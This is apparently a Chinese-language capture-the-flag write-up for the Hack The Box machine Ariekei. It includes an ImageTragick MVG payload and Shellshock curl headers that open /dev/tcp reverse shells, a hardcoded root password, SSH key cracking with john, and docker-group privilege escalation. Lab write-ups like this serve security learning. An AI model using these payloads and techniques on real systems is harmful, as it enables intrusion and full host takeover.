基本信息

端口扫描

两个ssh,一个443:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ nmap -sC -sV 10.10.10.65

Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 14:17 CST
Nmap scan report for 10.10.10.65
Host is up (0.068s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a7:5b:ae:65:93:ce:fb:dd:f9:6a:7f:de:50:67:f6:ec (RSA)
|   256 64:2c:a6:5e:96:ca:fb:10:05:82:36:ba:f0:c9:92:ef (ECDSA)
|_  256 51:9f:87:64:be:99:35:2a:80:a6:a2:25:eb:e0:95:9f (ED25519)
443/tcp  open  ssl/http nginx 1.10.2
|_http-server-header: nginx/1.10.2
|_http-title: Site Maintenance
| ssl-cert: Subject: stateOrProvinceName=Texas/countryName=US
| Subject Alternative Name: DNS:calvin.ariekei.htb, DNS:beehive.ariekei.htb
| Not valid before: 2017-09-24T01:37:05
|_Not valid after:  2045-02-08T01:37:05
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
1022/tcp open  ssh      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 98:33:f6:b6:4c:18:f5:80:66:85:47:0c:f6:b7:90:7e (DSA)
|   2048 78:40:0d:1c:79:a1:45:d4:28:75:35:36:ed:42:4f:2d (RSA)
|   256 45:a6:71:96:df:62:b5:54:66:6b:91:7b:74:6a:db:b7 (ECDSA)
|_  256 ad:8d:4d:69:8e:7a:fd:d8:cd:6e:c1:4f:6f:81:b4:1f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.95 seconds

443

直接访问是正在开发:

证书里有两个域名,加hosts:

1
10.10.10.65 calvin.ariekei.htb beehive.ariekei.htb

分别访问,一个404,一个正在开发:

目录扫描

1
2
3
4
5
6
7
8
9
10
gobuster dir -u https://beehive.ariekei.htb/ -k  -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50
/blog                 (Status: 301) [Size: 325] [--> http://beehive.ariekei.htb/blog/]
/cgi-bin/             (Status: 403) [Size: 295]
/index.html           (Status: 200) [Size: 487]

gobuster dir -u https://beehive.ariekei.htb/cgi-bin/ -k  -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,cgi,html,txt -t 50
/stats                (Status: 200) [Size: 1223]

gobuster dir -u https://calvin.ariekei.htb/ -k  -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50
/upload               (Status: 200) [Size: 1656]

blog

stats

访问得到一些系统信息,bash 4.2.37:

upload

一个文件上传,正常上传没反应,标题是”Image Converter”,应该是做图像转换的:

shellshock

4.2.37的bash可能存在shellshock,但测试只能得到一个表情:

1
curl -k -H "User-Agent: () { :; }; /bin/miao" https://beehive.ariekei.htb/cgi-bin/stats

ImageTragick

图像转换相关,一般是通过ImageMagick,搜到这个漏洞

直接上传恶意文件,转换时执行代码,得到docker 容器reverse shell:

shell.mvg

1
2
3
4
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|setsid /bin/bash -i >/dev/tcp/10.10.14.14/443 0<&1 2>&1")'ms
pop graphic-context

信息

容器内枚举信息,发现bastion相关,1022端口就是它的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
mount -l
/dev/mapper/ariekei--vg-root on /app type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/ariekei--vg-root on /common type ext4 (ro,relatime,errors=remount-ro,data=ordered)

[root@calvin .secrets]# pwd
pwd
/common/.secrets
[root@calvin .secrets]# ls -al
ls -al
total 16
drwxrwxr-x 2 root root 4096 Sep 24  2017 .
drwxr-xr-x 5 root root 4096 Sep 23  2017 ..
-r--r----- 1 root root 1679 Sep 23  2017 bastion_key
-r--r----- 1 root root  393 Sep 23  2017 bastion_key.pub

[root@calvin bastion-live]# pwd
pwd
/common/containers/bastion-live
[root@calvin bastion-live]# ls
ls
Dockerfile
build.sh
sshd_config
start.sh
cat Dockerfile
FROM rastasheep/ubuntu-sshd
RUN echo "root:Ib3!kTEvYw6*P7s" | chpasswd
RUN mkdir -p /root/.ssh
RUN echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDwzZ8tXRyG6en6U8d4r/oL/fpx2Aw+V22u8dJjNnSP9jly+RFJk8Z+aKMFTIYJ+orjyMxieqMtyYdVOUDvCanMnChmPbIWqw6UzdV+nnBrWTE/4keDSRn8ijs10tPPiBDDDpqQf21XiiyUfD0RkAl3gJk6hw7wHfWEilR1KWflbNAlau+lfM9YOFLbYrFmpKnZivqkDtuEPfnIVDurS2CiDC+oS+fnP2nGcIMec95iiPpJ4MhPvbdlb+UCxV6FoNtehT9ciZukD0xIXakwAwGlPlFQbzQqqEjEh5ltvnaJG6QzPfLnB6Uis8ku0NNDitreBm2Ba9sJ8NpXh46Ighhh root@arieka" > /root/.ssh/authorized_keys
[root@calvin bastion-live]#                                         cat build.sh
cat build.sh
#!/bin/bash
[root@calvin bastion-live]#                                         cat start.sh
cat start.sh
docker run \
-v /dev/null:/root/.sh_history \
-v /dev/null:/root/.bash_history \
--restart on-failure:5 \
--net arieka-live-net --ip 172.23.0.253 \
-h ezra.ariekei.htb --name bastion-live -dit \
-v /opt/docker:/common:ro \
-v $(pwd)/sshd_config:/etc/ssh/sshd_config:ro \
-p 1022:22 bastion-template

docker network connect --ip 172.24.0.253 arieka-test-net bastion-live

bastion

使用得到的信息可以登录bastion docker:

信息

这个同样有common containers文件夹,里面查看配置,可以发现waf,就是前面443那里只能得到表情的原因,另外根据nginx配置可以知道beehive.ariekei.htb是blog-test:

1
2
3
4
root@ezra:/common/containers/waf-live# pwd
/common/containers/waf-live
root@ezra:/common/containers/waf-live# cat modsecurity.conf
root@ezra:/common/containers/waf-live# cat nginx.conf

shellshock

现在可以在内部进行shellshock,从而不受waf影响:

1
root@ezra:~# python 34900.py payload=reverse rhost=172.24.0.2 lhost=172.24.0.253 lport=1234 pages=/cgi-bin/stats

blog

现在我们有blog的www-data,前面的文件里得到有root密码,所以可以直接转发端口u方便操作,打reverse shell后升级tty,切到root:

1
2
3
4
5
6
7
8
root:Ib3!kTEvYw6*P7s

ssh -i bastion_key root@10.10.10.65 -p 1022 -L 8443:172.24.0.2:80

# /bin/bash 绝对路径
curl -H "User-Agent: () { :; }; echo ; echo ; /bin/bash -c 'bash -i >& /dev/tcp/172.24.0.253/1234 0>&1'" http://127.0.0.1:8443/cgi-bin/stats

python -c 'import pty; pty.spawn("/bin/bash")'

user flag

blog容器的用户目录里得到user.txt:

spanishdancer

blog用户目录.ssh目录有个加密的私钥,破解

1
2
3
4
python /usr/share/john/ssh2john.py temp_rsa > hash.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

purple1          (temp_rsa)

这个私钥和密码登录宿主机的spanishdancer用户:

提权信息

当前用户在docker组里:

1
2
spanishdancer@ariekei:~$ id
uid=1000(spanishdancer) gid=1000(spanishdancer) groups=1000(spanishdancer),999(docker)

提权 & root flag

就是直接挂载读取,或者挂载后修改权限外部读取

1
docker run -v /:/rootfs -i -t bash

参考资料